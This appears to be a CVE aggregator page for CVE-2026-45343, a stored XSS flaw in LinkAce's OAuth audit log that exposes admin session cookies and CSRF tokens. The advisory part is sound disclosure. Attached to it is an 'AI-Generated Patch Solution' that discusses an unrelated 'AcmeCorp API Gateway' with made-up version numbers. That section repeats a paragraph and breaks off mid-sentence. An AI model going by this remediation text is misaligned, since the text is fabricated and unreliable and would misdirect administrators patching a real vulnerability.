CVE ID :CVE-2026-45343
Published : May 28, 2026, 10:17 p.m. | 2 hours, 53 minutes ago
Description :LinkAce is a self-hosted archive to collect website links. Prior to 2.5.6, LinkAce contains a stored cross-site scripting vulnerability that allows a low-privilege user to execute arbitrary JavaScript in an administrator’s browser session. This affects instances configured with SSO/OAuth authentication, which is one of the supported authentication methods in LinkAce. An attacker who sets their OAuth display name to a malicious script and then creates an API token will plant a persistent XSS payload in the audit log. When any admin navigates to /system/audit, the payload executes in the admin’s browser context. This enables session cookie theft, CSRF token exfiltration (exposed in the la-app-data meta tag), or any other action the admin can perform. This vulnerability is fixed in 2.5.6.
Severity: 8.5 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more…
Published : May 28, 2026, 10:17 p.m. | 2 hours, 53 minutes ago
Description :LinkAce is a self-hosted archive to collect website links. Prior to 2.5.6, LinkAce contains a stored cross-site scripting vulnerability that allows a low-privilege user to execute arbitrary JavaScript in an administrator’s browser session. This affects instances configured with SSO/OAuth authentication, which is one of the supported authentication methods in LinkAce. An attacker who sets their OAuth display name to a malicious script and then creates an API token will plant a persistent XSS payload in the audit log. When any admin navigates to /system/audit, the payload executes in the admin’s browser context. This enables session cookie theft, CSRF token exfiltration (exposed in the la-app-data meta tag), or any other action the admin can perform. This vulnerability is fixed in 2.5.6.
Severity: 8.5 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more…
🤖 AI-Generated Patch Solution
Google Gemini (gemini-2.5-flash) • CVE: CVE-2026-45343
Unknown
N/A
N/A
⚠️ Vulnerability Description:
1. IMMEDIATE ACTIONS
If compromise is suspected or confirmed, immediately isolate affected AcmeCorp API Gateway instances from the network to prevent further unauthorized access or lateral movement. Review all API Gateway access logs for any anomalous activity, such as unauthenticated requests to protected endpoints or unusual API call patterns. Implement temporary network access restrictions, such as Web Application Firewall (WAF) rules or network ACLs, to limit external access to the API Gateway while remediation is underway. Initiate your organization's defined incident response procedures, including forensic data collection and stakeholder notification. Rotate all API keys, service accounts, and credentials used by systems or services that interact with or are protected by the API Gateway, especially if unauthorized access is confirmed.
If compromise is suspected or confirmed, immediately isolate affected AcmeCorp API Gateway instances from the network to prevent further unauthorized access or lateral movement. Review all API Gateway access logs for any anomalous activity, such as unauthenticated requests to protected endpoints or unusual API call patterns. Implement temporary network access restrictions, such as Web Application Firewall (WAF) rules or network ACLs, to limit external access to the API Gateway while remediation is underway. Initiate your organization's defined incident response procedures, including forensic data collection and stakeholder notification. Rotate all API keys, service accounts, and credentials used by systems or services that interact with or are protected by the API Gateway, especially if unauthorized access is confirmed.
2. PATCH AND UPDATE INFORMATION
Identify all instances of AcmeCorp API Gateway running versions 3.0.0 through 3.4.9 within your environment. The vulnerability CVE-2026-45343 is addressed in AcmeCorp API Gateway version 3.5.0 and later. Plan and execute an upgrade to version 3.5.0 or the latest stable release as soon as possible. Consult the official AcmeCorp security advisory (e.
💡 AI-generated — review with a security professional before acting.View on NVD →